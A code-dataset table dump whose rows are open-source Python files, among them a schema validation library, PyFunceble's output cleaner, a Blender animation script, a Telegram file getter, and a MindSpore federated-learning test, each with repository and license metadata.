content
stringlengths 7
928k
| avg_line_length
float64 3.5
33.8k
| max_line_length
int64 6
139k
| alphanum_fraction
float64 0.08
0.96
| licenses
sequence | repository_name
stringlengths 7
104
| path
stringlengths 4
230
| size
int64 7
928k
| lang
stringclasses 1
value |
---|---|---|---|---|---|---|---|---|
import math
a1=float(input("Enter a number: "))
print("{} to int is {}".format(a1,math.floor(a1)))
a2=1.5
print(math.trunc(a2))
a3=3.14
print(int(a3)) | 16.888889 | 50 | 0.657895 | [
"MIT"
] | jhonatanmaia/python | study/curso-em-video/exercises/016.py | 152 | Python |
"""
Copyright (c) 2014-2015 F-Secure
See LICENSE for details
"""
import re
import inspect
import datetime
from copy import copy
from collections import defaultdict
import isodate
import pytz
from .errors import ValidationError, DeclarationError
class BaseField(object):
"""
Superclass for all fields
description (None|string = None)
help text to be shown in schema. This should include the reasons why this field actually needs to exist.
required (bool = False)
flag that specifes if the field has to be present
\*\*kwargs
extra parameters that are not programmatically supported
"""
verbose_name = "unknown_type"
def __init__(self, description=None, required=True, **kwargs):
self.description = description
self.kwargs = kwargs
self.required = required
def _to_python(self, val):
""" Transforms primitive data (e.g. dict, list, str, int, bool, float) to a python object """
return val
def _validate(self, val):
""" Validates incoming data against constraints defined via field declaration """
if self.required and val is None:
raise ValidationError("Value is required and thus cannot be None")
def deserialize(self, val):
""" Converts data passed over the wire or from the script into sth. to be used in python scripts """
rval = self._to_python(val)
self._validate(rval)
return rval
def serialize(self, val):
""" Converts python object into sth. that can be sent over the wire """
return val
def get_schema(self):
rval = {
"description": self.description,
"type": self.verbose_name,
"required": self.required
}
rval.update(self.kwargs)
return rval
class BaseIsoField(BaseField):
""" Represents time entity that can be either a native object or ISO 8601 datetime string.
The item is
`serialized <https://docs.python.org/2/library/datetime.html#datetime.datetime.isoformat>`_ into ISO 8601 string.
"""
def _parse(self, val):
""" Supposed to transform the value into a valid Python type using a respective isodate function """
raise NotImplementedError
def _to_python(self, val):
val = super(BaseIsoField, self)._to_python(val)
if val is None:
return None
if isinstance(val, basestring):
try:
# Parse datetime
val = self._parse(val)
except ValueError:
raise ValidationError("Datetime timestamp has to be a string in ISO 8601 format")
return val
def serialize(self, val):
if val is None:
return None
return val.isoformat()
class DateTimeField(BaseIsoField):
""" datetime object serialized into YYYY-MM-DDThh:mm:ss.sTZD.
E.g.: 2013-09-30T11:32:39.984847 """
verbose_name = "datetime"
def _parse(self, val):
return isodate.parse_datetime(val)
def _to_python(self, val):
val = super(DateTimeField, self)._to_python(val)
if val is None:
return None
# Convert to naive UTC
if hasattr(val, "tzinfo") and val.tzinfo:
val = val.astimezone(pytz.utc)
val = val.replace(tzinfo=None)
return val
class DateField(BaseIsoField):
""" date object serialized into YYYY-MM-DD.
E.g.: 2013-09-30 """
verbose_name = "date"
def _parse(self, val):
return isodate.parse_date(val)
class TimeField(BaseIsoField):
""" time object serialized into hh:mm:ssTZD.
E.g.: 11:32:39.984847 """
verbose_name = "time"
def _parse(self, val):
return isodate.parse_time(val)
def _to_python(self, val):
val = super(TimeField, self)._to_python(val)
if val is None:
return None
# Convert to naive UTC
if hasattr(val, "tzinfo") and val.tzinfo:
dt = datetime.datetime.combine(datetime.date.today(), val)
dt = dt.astimezone(pytz.utc)
dt = dt.replace(tzinfo=None)
val = dt.time()
return val
class DurationField(BaseIsoField):
""" timedelta object serialized into PnYnMnDTnHnMnS.
E.g.: P105DT9H52M49.448422S"""
verbose_name = "duration"
def _parse(self, val):
return isodate.parse_duration(val)
def serialize(self, val):
if val is None:
return None
return isodate.duration_isoformat(val)
class BaseSimpleField(BaseField):
python_type = None
def __init__(self, default=None, **kwargs):
super(BaseSimpleField, self).__init__(**kwargs)
try:
self.default = self._to_python(default)
except ValidationError, e:
raise DeclarationError("default: %s" % str(e))
def _to_python(self, val):
if val is None:
return None
try:
return self.python_type(val)
except ValueError:
raise ValidationError("Conversion of value %r failed" % val)
def get_schema(self):
rval = super(BaseSimpleField, self).get_schema()
rval["default"] = self.default
return rval
class IndexableField(BaseSimpleField):
def __init__(self, choices=None, invalid_choices=None, **kwargs):
super(IndexableField, self).__init__(**kwargs)
if choices is not None:
if not isinstance(choices, (list, tuple)):
raise DeclarationError("choices has to be a list or tuple")
tempo = []
for i in xrange(len(choices)):
try:
tempo.append(self._to_python(choices[i]))
except Exception, e:
raise DeclarationError("[%d]: %s" % (i, str(e)))
choices = tempo
if invalid_choices is not None:
if not isinstance(invalid_choices, (list, tuple)):
raise DeclarationError("invalid_choices has to be a list or tuple")
tempo = []
for i in xrange(len(invalid_choices)):
try:
tempo.append(self._to_python(invalid_choices[i]))
except Exception, e:
raise DeclarationError("[%d]: %s" % (i, str(e)))
invalid_choices = tempo
if self.default is not None:
if invalid_choices and self.default in invalid_choices:
raise DeclarationError("default value is in invalid_choices")
if choices and self.default not in choices:
raise DeclarationError("default value is not in choices")
if invalid_choices and choices:
inter = set(choices).intersection(set(invalid_choices))
if inter:
raise DeclarationError("these choices are stated as both valid and invalid: %r" % inter)
self.choices, self.invalid_choices = choices, invalid_choices
def _validate(self, val):
super(IndexableField, self)._validate(val)
if val is None:
return
if self.choices and val not in self.choices:
raise ValidationError("Val %r must be one of %r" % (val, self.choices))
if self.invalid_choices and val in self.invalid_choices:
raise ValidationError("Val %r must NOT be one of %r" % (val, self.invalid_choices))
def get_schema(self):
rval = super(IndexableField, self).get_schema()
rval["choices"] = self.choices
rval["invalid_choices"] = self.invalid_choices
return rval
class DigitField(IndexableField):
""" Base class for fields that represent numbers
min_val (int|long|float = None)
Minumum threshold for incoming value
max_val (int|long|float = None)
Maximum threshold for imcoming value
"""
def __init__(self, min_val=None, max_val=None, **kwargs):
super(DigitField, self).__init__(**kwargs)
min_val = self._to_python(min_val)
max_val = self._to_python(max_val)
value_check = min_val or max_val
if self.choices is not None and value_check is not None:
raise DeclarationError("choices and min or max value limits do not make sense together")
if min_val is not None and max_val is not None:
if max_val < min_val:
raise DeclarationError("max val is less than min_val")
if self.default is not None:
if min_val is not None and self.default < min_val:
raise DeclarationError("default value is too small")
if max_val is not None and self.default > max_val:
raise DeclarationError("default value is too big")
self.min_val, self.max_val = min_val, max_val
def _to_python(self, val):
if not isinstance(val, (basestring, int, long, float, type(None))):
raise ValidationError("Has to be a digit or a string convertable to digit")
return super(DigitField, self)._to_python(val)
def _validate(self, val):
super(DigitField, self)._validate(val)
if val is None:
return
if self.min_val is not None and val < self.min_val:
raise ValidationError("Digit %r is too small. Has to be at least %r." % (val, self.min_val))
if self.max_val is not None and val > self.max_val:
raise ValidationError("Digit %r is too big. Has to be at max %r." % (val, self.max_val))
def get_schema(self):
rval = super(DigitField, self).get_schema()
rval.update({
"min_val": self.min_val,
"max_val": self.max_val
})
return rval
class IntegerField(DigitField):
""" Transforms input data that could be any number or a string value with that number into *long* """
python_type = long
verbose_name = "int"
class FloatField(DigitField):
""" Transforms input data that could be any number or a string value with that number into *float* """
python_type = float
verbose_name = "float"
class StringField(IndexableField):
""" Represents any arbitrary text
regex (string = None)
`Python regular expression <https://docs.python.org/2/library/re.html#regular-expression-syntax>`_
used to validate the string.
min_length (int = None)
Minimum size of string value
max_length (int = None)
Maximum size of string value
"""
python_type = unicode
verbose_name = "string"
def __init__(self, regex=None, min_length=None, max_length=None, **kwargs):
super(StringField, self).__init__(**kwargs)
def _set(name, transform_f, val):
if val is not None:
try:
val = transform_f(val)
except Exception, e:
raise DeclarationError("%s: %s" % (name, str(e)))
setattr(self, name, val)
val_check = min_length or max_length or regex
if self.choices and val_check is not None:
raise DeclarationError("choices and value checkers do not make sense together")
_set("regex", re.compile, regex)
_set("min_length", int, min_length)
_set("max_length", int, max_length)
def _to_python(self, val):
if not isinstance(val, (basestring, type(None))):
raise ValidationError("Has to be string")
return super(StringField, self)._to_python(val)
def _validate(self, val):
super(StringField, self)._validate(val)
if val is None:
return
if self.min_length is not None:
if len(val) < self.min_length:
raise ValidationError("Length is too small. Is %r has to be at least %r." % (len(val),
self.min_length))
if self.max_length is not None:
if len(val) > self.max_length:
raise ValidationError("Length is too small. Is %r has to be at least %r." % (len(val),
self.max_length))
reg = self.regex
if reg is not None:
if not reg.match(val):
raise ValidationError("%r did not match regexp %r" % (val, reg.pattern))
def get_schema(self):
rval = super(StringField, self).get_schema()
rval.update({
"regex": getattr(self.regex, "pattern", None),
"min_length": self.min_length,
"max_length": self.max_length})
return rval
class BooleanField(BaseSimpleField):
""" Expects only a boolean value as incoming data """
verbose_name = "boolean"
python_type = bool
def _to_python(self, val):
if not isinstance(val, (bool, type(None))):
raise ValidationError("Has to be a digit or a string convertable to digit")
return super(BooleanField, self)._to_python(val)
PRIMITIVE_TYPES_MAP = {
int: IntegerField,
float: FloatField,
str: StringField,
unicode: StringField,
basestring: StringField,
bool: BooleanField
}
def wrap_into_field(simple_type):
if not isinstance(simple_type, BaseField):
field_class = PRIMITIVE_TYPES_MAP.get(simple_type, None)
if field_class:
return field_class()
else:
return ObjectField(simple_type)
return simple_type
class ListField(BaseField):
""" Represents a collection of primitives. Serialized into a list.
item_type (python primitve|Field instance)
value is used by list field to validate individual items
python primitive are internally mapped to Field instances according to
:data:`PRIMITIVE_TYPES_MAP <resource_api.interfaces.PRIMITIVE_TYPES_MAP>`
"""
verbose_name = "list"
def __init__(self, item_type, **kwargs):
super(ListField, self).__init__(**kwargs)
self.item_type = wrap_into_field(item_type)
def deserialize(self, val):
self._validate(val)
if val is None:
return val
errors = []
rval = []
if not isinstance(val, list):
raise ValidationError("Has to be list")
for item in val:
try:
rval.append(self.item_type.deserialize(item))
except ValidationError, e:
errors.append([val.index(item), e.message])
if errors:
raise ValidationError(errors)
return rval
def get_schema(self):
rval = super(ListField, self).get_schema()
rval["schema"] = self.item_type.get_schema()
return rval
def serialize(self, val):
return [self.item_type.serialize(item) for item in val]
class ObjectField(BaseField):
""" Represents a nested document/mapping of primitives. Serialized into a dict.
schema (class):
schema to be used for validation of the nested document, it does not have to be Schema subclass - just a
collection of fields
ObjectField can be declared via two different ways.
First, if there is a reusable schema defined elsewhere:
>>> class Sample(Schema):
>>> object_field = ObjectField(ExternalSchema, required=False, description="Zen")
Second, if the field is supposed to have a unique custom schema:
>>> class Sample(Schema):
>>> object_field = ObjectField(required=False, description="Zen", schema=dict(
>>> "foo": StringField()
>>> ))
"""
verbose_name = "dict"
def __init__(self, schema, **kwargs):
super(ObjectField, self).__init__(**kwargs)
if isinstance(schema, dict):
class Tmp(Schema):
pass
for key, value in schema.iteritems():
setattr(Tmp, key, value)
schema = Tmp
elif inspect.isclass(schema) and not issubclass(schema, Schema):
class Tmp(schema, Schema):
pass
schema = Tmp
self._schema = schema()
def deserialize(self, val):
self._validate(val)
if val is None:
return val
return self._schema.deserialize(val)
def get_schema(self):
return {
"type": self.verbose_name,
"schema": self._schema.get_schema()
}
def serialize(self, val):
return self._schema.serialize(val)
class Schema(object):
""" Base class for containers that would hold one or many fields.
it has one class attribute that may be used to alter shcema's validation flow
has_additional_fields (bool = False)
If *True* it shall be possible to have extra fields inside input data that will not be validated
NOTE: when defining schemas do not use any of the following reserved keywords:
- find_fields
- deserialize
- get_schema
- serialize
- has_additional_fields
"""
has_additional_fields = False
def __init__(self, validate_required_constraint=True, with_errors=True):
self._required_fields = set()
self._defaults = {}
self._validate_required_constraint, self._with_errors = validate_required_constraint, with_errors
self.fields = {}
for field_name in dir(self):
field = getattr(self, field_name)
if not isinstance(field, BaseField):
continue
self._add_field(field_name, copy(field))
def _add_field(self, field_name, field):
setattr(self, field_name, field)
self.fields[field_name] = field
if isinstance(field, BaseField) and field.required:
self._required_fields.add(field_name)
if isinstance(field, BaseSimpleField) and field.default is not None:
self._defaults[field_name] = field.default
def find_fields(self, **kwargs):
""" Returns a set of fields where each field contains one or more specified keyword arguments """
rval = set()
for key, value in kwargs.iteritems():
for field_name, field in self.fields.iteritems():
if field.kwargs.get(key) == value:
rval.add(field_name)
return rval
def deserialize(self, data, validate_required_constraint=True, with_errors=True):
""" Validates and transforms input data into something that is used withing data access layer
data (dict)
Incoming data
validate_required_constraint (bool = True)
If *False*, schema will not validate required constraint of the fields inside
with_errors (bool = True)
If *False*, all fields that contain errors are silently excluded
@raises ValidationError
When one or more fields has errors and *with_errors=True*
"""
if not isinstance(data, dict):
raise ValidationError({"__all__": "Has to be a dict"})
transformed = dict(self._defaults)
errors = defaultdict(list)
for key, value in data.iteritems():
field = self.fields.get(key)
if field is None:
if self.has_additional_fields:
transformed[key] = value
else:
errors["__all__"].append("Field %r is not defined" % key)
continue
try:
transformed[key] = field.deserialize(value)
except ValidationError, e:
errors[key].append(e.message)
if validate_required_constraint:
for field in self._required_fields:
if transformed.get(field) is None and field not in errors:
errors[field].append("Required field is missing")
if errors and with_errors:
raise ValidationError(errors)
else:
return transformed
def get_schema(self):
""" Returns a JSONizable schema that could be transfered over the wire """
rval = {}
for field_name, field in self.fields.iteritems():
rval[field_name] = field.get_schema()
if self.has_additional_fields:
rval["has_additional_fields"] = True
return rval
def serialize(self, val):
""" Transforms outgoing data into a JSONizable dict """
rval = {}
for key, value in val.iteritems():
field = self.fields.get(key)
if field:
rval[key] = field.serialize(value)
elif self.has_additional_fields:
rval[key] = value
else:
pass
return rval
| 33.310178 | 117 | 0.61065 | [
"Apache-2.0"
] | F-Secure/resource-api | src/resource_api/schema.py | 20,619 | Python |
"""
The tool to check the availability or syntax of domains, IPv4, IPv6 or URL.
::
██████╗ ██╗ ██╗███████╗██╗ ██╗███╗ ██╗ ██████╗███████╗██████╗ ██╗ ███████╗
██╔══██╗╚██╗ ██╔╝██╔════╝██║ ██║████╗ ██║██╔════╝██╔════╝██╔══██╗██║ ██╔════╝
██████╔╝ ╚████╔╝ █████╗ ██║ ██║██╔██╗ ██║██║ █████╗ ██████╔╝██║ █████╗
██╔═══╝ ╚██╔╝ ██╔══╝ ██║ ██║██║╚██╗██║██║ ██╔══╝ ██╔══██╗██║ ██╔══╝
██║ ██║ ██║ ╚██████╔╝██║ ╚████║╚██████╗███████╗██████╔╝███████╗███████╗
╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═════╝╚══════╝╚═════╝ ╚══════╝╚══════╝
Provides the cleaning interface.
Author:
Nissar Chababy, @funilrys, contactTATAfunilrysTODTODcom
Special thanks:
https://pyfunceble.github.io/special-thanks.html
Contributors:
https://pyfunceble.github.io/contributors.html
Project link:
https://github.com/funilrys/PyFunceble
Project documentation:
https://pyfunceble.readthedocs.io///en/master/
Project homepage:
https://pyfunceble.github.io/
License:
::
MIT License
Copyright (c) 2017, 2018, 2019, 2020 Nissar Chababy
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from os import sep as directory_separator
from os import walk
import PyFunceble
class Clean:
"""
Provide the cleaning logic.
.. note::
By cleaning we mean the cleaning of the :code:`output` directory.
:param list_to_test: The list of domains we are testing.
:type list_to_test: list|None
:param bool clean_all:
Tell the subsystem if we need to clean all.
Which include, of course, the output directory but also
all other file(s) generated by our system.
:param str file_path:
The path to the file we tested.
.. note::
This is only relevant if you use the MariaDB/MySQL database.
"""
def __init__(self, clean_all=False, file_path=None):
# We clean the output directory.
self.almost_everything(clean_all, file_path)
@classmethod
def file_to_delete(cls, all_files=False):
"""
Return the list of file to delete.
"""
# We initiate the directory we have to look for.
directory = "{0}{1}".format(
PyFunceble.OUTPUT_DIRECTORY, PyFunceble.OUTPUTS.parent_directory
)
if not directory.endswith(directory_separator): # pragma: no cover
# For safety, if it does not ends with the directory separator, we append it
# to its end.
directory += directory_separator
# We initiate a variable which will save the list of file to delete.
result = []
for root, _, files in walk(directory):
# We walk in the directory and get all files and sub-directories.
for file in files:
# If there is files in the current sub-directory, we loop
# through the list of files.
if file in [".gitignore", ".keep"]:
continue
if (
not all_files and "logs" in root and ".log" in file
): # pragma: no cover
continue
# The file is not into our list of file we do not have to delete.
if root.endswith(directory_separator):
# The root ends with the directory separator.
# We construct the path and append the full path to the result.
result.append(root + file)
else:
# The root directory does not ends with the directory separator.
# We construct the path by appending the directory separator
# between the root and the filename and append the full path to
# the result.
result.append(root + directory_separator + file) # pragma: no cover
# We return our list of file to delete.
return result
@classmethod
def databases_to_delete(cls): # pragma: no cover
"""
Set the databases files to delete.
"""
# We initate the result variable.
result = []
if PyFunceble.CONFIGURATION.db_type == "json":
# We initiate the directory we have to look for.
directory = PyFunceble.CONFIG_DIRECTORY
# We append the dir_structure file.
result.append(
"{0}{1}".format(
directory, PyFunceble.OUTPUTS.default_files.dir_structure
)
)
# We append the iana file.
result.append(
"{0}{1}".format(directory, PyFunceble.OUTPUTS.default_files.iana)
)
# We append the public suffix file.
result.append(
"{0}{1}".format(
directory, PyFunceble.OUTPUTS.default_files.public_suffix
)
)
# We append the inactive database file.
result.append(
"{0}{1}".format(directory, PyFunceble.OUTPUTS.default_files.inactive_db)
)
# We append the mining database file.
result.append(
"{0}{1}".format(directory, PyFunceble.OUTPUTS.default_files.mining)
)
return result
def almost_everything(self, clean_all=False, file_path=False):
"""
Delete almost all discovered files.
:param bool clean_all:
Tell the subsystem if we have to clean everything instesd
of almost everything.
"""
if (
"do_not_clean" not in PyFunceble.INTERN
or not PyFunceble.INTERN["do_not_clean"]
):
# We get the list of file to delete.
to_delete = self.file_to_delete(clean_all)
if (
not PyFunceble.abstracts.Version.is_local_cloned() and clean_all
): # pragma: no cover
to_delete.extend(self.databases_to_delete())
for file in to_delete:
# We loop through the list of file to delete.
# And we delete the currently read file.
PyFunceble.helpers.File(file).delete()
PyFunceble.LOGGER.info(f"Deleted: {file}")
if clean_all: # pragma: no cover
to_avoid = ["whois"]
else:
to_avoid = ["whois", "auto_continue", "inactive", "mining"]
if not file_path:
query = "DELETE FROM {0}"
else: # pragma: no cover
query = "DELETE FROM {0} WHERE file_path = %(file_path)s"
if PyFunceble.CONFIGURATION.db_type in [
"mariadb",
"mysql",
]: # pragma: no cover
with PyFunceble.engine.MySQL() as connection:
for database_name in [
y
for x, y in PyFunceble.engine.MySQL.tables.items()
if x not in to_avoid
]:
lquery = query.format(database_name)
with connection.cursor() as cursor:
cursor.execute(lquery, {"file_path": file_path})
PyFunceble.LOGGER.info(
"Cleaned the data related to "
f"{repr(file_path)} from the {database_name} table."
)
if (
not PyFunceble.abstracts.Version.is_local_cloned() and clean_all
): # pragma: no cover
PyFunceble.load_config()
PyFunceble.LOGGER.info(f"Reloaded configuration.")
| 34.65748 | 88 | 0.546291 | [
"MIT"
] | NeolithEra/PyFunceble | PyFunceble/output/clean.py | 9,585 | Python |
class BaseFileGetter:
async def get_file(self, file_id: str):
raise NotImplementedError()
async def get_userpic(self, user_id: int):
raise NotImplementedError()
async def get_thumb(self, message):
"""
Тупой алгоритм,
который рекурсивно с конца ищет поле "thumb"
и если находит, возвращает его
"""
if isinstance(message, list):
values = list(enumerate(message))
elif isinstance(message, dict):
values = list(message.items())
else:
return
values.reverse()
for k, v in values:
if k == "reply_to_message":
continue
if isinstance(v, dict):
if "thumb" in v:
return v["thumb"]
if result := await self.get_thumb(v):
return result
async def get_document(self, message):
"""
Тупой алгоритм,
который рекурсивно с конца ищет поле "file_id"
и если находит, возвращает его родителя
"""
if isinstance(message, list):
values = list(enumerate(message))
elif isinstance(message, dict):
values = list(message.items())
else:
return
values.reverse()
for k, v in values:
if k == "reply_to_message":
continue
if isinstance(v, dict):
if "file_id" in v:
return v
if result := await self.get_document(v):
return result
| 29.622642 | 54 | 0.52293 | [
"MIT"
] | Forevka/tgquote | tgquote/filegetters/base.py | 1,716 | Python |
"""
ANIMATE RIGID OBJECTS IN BLENDER.
Requirements:
------------------------------------------------------------------------------
IMPORTANT! This has only been tested with Blender 2.79 API.
Warnings:
------------------------------------------------------------------------------
Do not expect all blends to be perfect; we did additional filtering of
generated blends to ensure that random data is well-formed.
Execution:
------------------------------------------------------------------------------
This script is intended to run inside blender launched in background mode.
Sample invocation is:
blender --background --python-exit-code 1 --factory-startup \
--python blender/animate_main.py -- \
--set_env_lighting_image=$ENVMAPS \
--obj_file="$OBJ" \
--output_blend="$OFILE"
Capabilities:
------------------------------------------------------------------------------
Uses Blender's rigid body simulator to animate objects in the input file and
output a blend file with the animation.
"""
import bpy
import argparse
import logging
import math
import os
import sys
import random
import time
import traceback
# Add to path to make sure we can import modules inside Blender.
__sdir = os.path.dirname(os.path.realpath(__file__))
if __sdir not in sys.path:
sys.path.append(__sdir)
import rigid_body_util
import geo_util
import render_util
LOG = logging.getLogger(__name__)
if __name__ == "__main__":
try:
# FLAGS
# --------------------------------------------------------------------------
parser = argparse.ArgumentParser(
description='Utility to animate shapenet models randomly.')
parser.add_argument(
'--obj_file', action='store', type=str, required=True,
help='Input OBJ file.')
parser.add_argument(
'--simple_diagnostic', action='store_true', default=False,
help='If true, does not animate, but just imports and runs diagnostic info.')
parser.add_argument(
'--set_env_lighting_image', action='store', default='',
help='Image or directory of images; set to set environment lighting.')
parser.add_argument(
'--p_breaking', action='store', type=float, default=0.5,
help='Probability of breaking.')
parser.add_argument(
'--p_cam_track', action='store', type=float, default=0.5)
parser.add_argument(
'--p_bouncy', action='store', type=float, default=0.3)
parser.add_argument(
'--p_warp_time', action='store', type=float, default=0.3)
parser.add_argument(
'--p_tilt_floor', action='store', type=float, default=0.2)
parser.add_argument(
'--diagnostic_frame_prefix', action='store', default='')
parser.add_argument(
'--output_blend', action='store', type=str, required=True)
# Parse only arguments after --
# --------------------------------------------------------------------------
argv = sys.argv
if "--" not in argv:
argv = [] # as if no args are passed
else:
argv = argv[argv.index("--") + 1:]
args = parser.parse_args(argv)
random.seed(time.time())
render_util.set_width_height(1500, 1500)
if args.set_env_lighting_image:
render_util.setup_realistic_lighting(args.set_env_lighting_image, 3.0, False)
if args.simple_diagnostic:
rigid_body_util.obj_import_diagnostic(args.obj_file)
cam = geo_util.create_random_camera(
geo_util.BBox([-1.0,-1.0,0.0], [1.0, 1.0, 1.0]),
1.0, 1.0, 1.0)
else:
floor, objects = rigid_body_util.obj_import_animate(
args.obj_file,
allow_breaking=(random.random() < args.p_breaking))
cam = geo_util.create_random_camera(
geo_util.BBox([-1.0,-1.0,0.0], [1.0, 1.0, 1.0]),
1.0, 1.0, 1.0)
# Note: one can't truly slow down the simulation without altering
# the result in blender; empirically this gives a reasonable alternative
# timing
if random.random() < args.p_warp_time:
rigid_body_util.set_rigidbody_world_properties(
steps_per_sec=60, time_scale=0.5, solver_its=random.randint(3, 6))
if random.random() < args.p_tilt_floor:
axis = random.randint(0, 1)
angle = random.uniform(-math.pi * 0.2, math.pi * 0.2)
floor.rotation_euler[axis] = angle
if random.random() < args.p_bouncy:
restitution = random.uniform(0.38, 0.5)
for ob in objects + [floor]:
ob.rigid_body.restitution = restitution
if random.random() < args.p_cam_track:
geo_util.add_camera_track_constraint(
cam, objects[random.randint(0, len(objects) - 1)])
# bpy.context.scene.world.light_settings.samples = 2
bpy.ops.file.pack_all()
print('Saving blend to %s' % args.output_blend.replace('.blend', '_unbaked.blend'))
geo_util.save_blend(args.output_blend.replace('.blend', '_unbaked.blend'))
rigid_body_util.bake_simulation_bugfix()
print('Saving blend to %s' % args.output_blend)
geo_util.save_blend(args.output_blend)
if len(args.diagnostic_frame_prefix) > 0:
render_util.render_animation(args.diagnostic_frame_prefix, 1)
except Exception as e:
tb = traceback.format_exc()
LOG.critical(tb)
LOG.critical('Script failed')
raise e
| 37.385621 | 91 | 0.568182 | [
"MIT"
] | creativefloworg/creativeflow | creativeflow/blender/animate_main.py | 5,720 | Python |
"""search init"""
from pathfinder.search.algorithm import Algorithm
| 22.666667 | 49 | 0.794118 | [
"MIT"
] | rpfarish/pathfinder_visualizer | pathfinder/search/__init__.py | 68 | Python |
import cv2
import numpy as np
green = np.uint8([[[255,0,0]]])
hsv_green = cv2.cvtColor(green,cv2.COLOR_BGR2HSV)
print(hsv_green)
| 19.428571 | 50 | 0.705882 | [
"MIT"
] | KiLJ4EdeN/CV_PYTHON | CV_PYTHON/IMG_2.py | 136 | Python |
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import argparse
import numpy as np
import mindspore.context as context
import mindspore.nn as nn
from mindspore import Tensor
from mindspore.nn import TrainOneStepCell, WithLossCell
from src.model import LeNet5
from src.adam import AdamWeightDecayOp
parser = argparse.ArgumentParser(description="test_fl_lenet")
parser.add_argument("--device_target", type=str, default="CPU")
parser.add_argument("--server_mode", type=str, default="FEDERATED_LEARNING")
parser.add_argument("--ms_role", type=str, default="MS_WORKER")
parser.add_argument("--worker_num", type=int, default=0)
parser.add_argument("--server_num", type=int, default=1)
parser.add_argument("--scheduler_ip", type=str, default="127.0.0.1")
parser.add_argument("--scheduler_port", type=int, default=8113)
parser.add_argument("--fl_server_port", type=int, default=6666)
parser.add_argument("--start_fl_job_threshold", type=int, default=1)
parser.add_argument("--start_fl_job_time_window", type=int, default=3000)
parser.add_argument("--update_model_ratio", type=float, default=1.0)
parser.add_argument("--update_model_time_window", type=int, default=3000)
parser.add_argument("--fl_name", type=str, default="Lenet")
parser.add_argument("--fl_iteration_num", type=int, default=25)
parser.add_argument("--client_epoch_num", type=int, default=20)
parser.add_argument("--client_batch_size", type=int, default=32)
parser.add_argument("--client_learning_rate", type=float, default=0.1)
parser.add_argument("--scheduler_manage_port", type=int, default=11202)
parser.add_argument("--config_file_path", type=str, default="")
parser.add_argument("--encrypt_type", type=str, default="NOT_ENCRYPT")
# parameters for encrypt_type='DP_ENCRYPT'
parser.add_argument("--dp_eps", type=float, default=50.0)
parser.add_argument("--dp_delta", type=float, default=0.01) # 1/worker_num
parser.add_argument("--dp_norm_clip", type=float, default=1.0)
# parameters for encrypt_type='PW_ENCRYPT'
parser.add_argument("--share_secrets_ratio", type=float, default=1.0)
parser.add_argument("--cipher_time_window", type=int, default=300000)
parser.add_argument("--reconstruct_secrets_threshold", type=int, default=3)
args, _ = parser.parse_known_args()
device_target = args.device_target
server_mode = args.server_mode
ms_role = args.ms_role
worker_num = args.worker_num
server_num = args.server_num
scheduler_ip = args.scheduler_ip
scheduler_port = args.scheduler_port
fl_server_port = args.fl_server_port
start_fl_job_threshold = args.start_fl_job_threshold
start_fl_job_time_window = args.start_fl_job_time_window
update_model_ratio = args.update_model_ratio
update_model_time_window = args.update_model_time_window
share_secrets_ratio = args.share_secrets_ratio
cipher_time_window = args.cipher_time_window
reconstruct_secrets_threshold = args.reconstruct_secrets_threshold
fl_name = args.fl_name
fl_iteration_num = args.fl_iteration_num
client_epoch_num = args.client_epoch_num
client_batch_size = args.client_batch_size
client_learning_rate = args.client_learning_rate
scheduler_manage_port = args.scheduler_manage_port
config_file_path = args.config_file_path
dp_eps = args.dp_eps
dp_delta = args.dp_delta
dp_norm_clip = args.dp_norm_clip
encrypt_type = args.encrypt_type
ctx = {
"enable_fl": True,
"server_mode": server_mode,
"ms_role": ms_role,
"worker_num": worker_num,
"server_num": server_num,
"scheduler_ip": scheduler_ip,
"scheduler_port": scheduler_port,
"fl_server_port": fl_server_port,
"start_fl_job_threshold": start_fl_job_threshold,
"start_fl_job_time_window": start_fl_job_time_window,
"update_model_ratio": update_model_ratio,
"update_model_time_window": update_model_time_window,
"share_secrets_ratio": share_secrets_ratio,
"cipher_time_window": cipher_time_window,
"reconstruct_secrets_threshold": reconstruct_secrets_threshold,
"fl_name": fl_name,
"fl_iteration_num": fl_iteration_num,
"client_epoch_num": client_epoch_num,
"client_batch_size": client_batch_size,
"client_learning_rate": client_learning_rate,
"scheduler_manage_port": scheduler_manage_port,
"config_file_path": config_file_path,
"dp_eps": dp_eps,
"dp_delta": dp_delta,
"dp_norm_clip": dp_norm_clip,
"encrypt_type": encrypt_type
}
context.set_context(mode=context.GRAPH_MODE, device_target=device_target, save_graphs=False)
context.set_fl_context(**ctx)
if __name__ == "__main__":
epoch = 5
np.random.seed(0)
network = LeNet5(62)
criterion = nn.SoftmaxCrossEntropyWithLogits(sparse=True, reduction="mean")
net_opt = nn.Momentum(network.trainable_params(), 0.01, 0.9)
net_adam_opt = AdamWeightDecayOp(network.trainable_params(), weight_decay=0.1)
net_with_criterion = WithLossCell(network, criterion)
train_network = TrainOneStepCell(net_with_criterion, net_opt)
train_network.set_train()
losses = []
for _ in range(epoch):
data = Tensor(np.random.rand(32, 3, 32, 32).astype(np.float32))
label = Tensor(np.random.randint(0, 61, (32)).astype(np.int32))
loss = train_network(data, label).asnumpy()
losses.append(loss)
print(losses)
| 43.335821 | 92 | 0.769588 | [
